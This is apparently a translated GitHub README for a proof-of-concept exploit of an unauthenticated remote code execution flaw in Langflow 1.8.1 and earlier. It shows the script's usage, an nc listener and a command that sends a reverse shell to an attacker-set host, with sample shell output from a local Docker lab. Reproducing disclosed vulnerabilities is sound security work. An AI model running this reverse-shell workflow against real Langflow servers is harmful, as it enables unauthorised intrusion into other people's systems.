masterwok/CVE-2026-33017-Langflow-PoC
GitHub: masterwok/CVE-2026-33017-Langflow-PoC
这是一个针对 Langflow 1.8.1 及以下版本远程未授权 RCE 漏洞的概念验证(PoC)利用脚本。
Stars: 0 | Forks: 0
# PoC: CVE-2026-33017
Langflow <= 1.8.1 存在远程未经身份验证的 RCE 漏洞 ([https://nvd.nist.gov/vuln/detail/CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017))
## 用法
```
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target
PoC exploit: CVE-2026-33017
positional arguments:
target Target hostname
options:
-h, --help show this help message and exit
--lhost LHOST Reverse shell destination IP address
--lport LPORT Reverse shell destination port
```
## 示例
```
# 创建 docker 实例
docker run -d -p 7860:7860 langflowai/langflow:1.8.1
# 启动 listener
nc -lnvp 4444
# 启动 exploit
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444
# 应在 listener 中接收到 reverse shell
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
```
本项目仅供教育和研究用途提供。
作者不对滥用或由此代码造成的损害负责。
标签:CISA项目, CVE-2026-33017, Docker, Exploit, Langflow, PoC, Python, RCE, 反向Shell, 安全防御评估, 无后门, 暴力破解, 未授权访问, 概念验证, 漏洞复现, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向工具, 隐私保护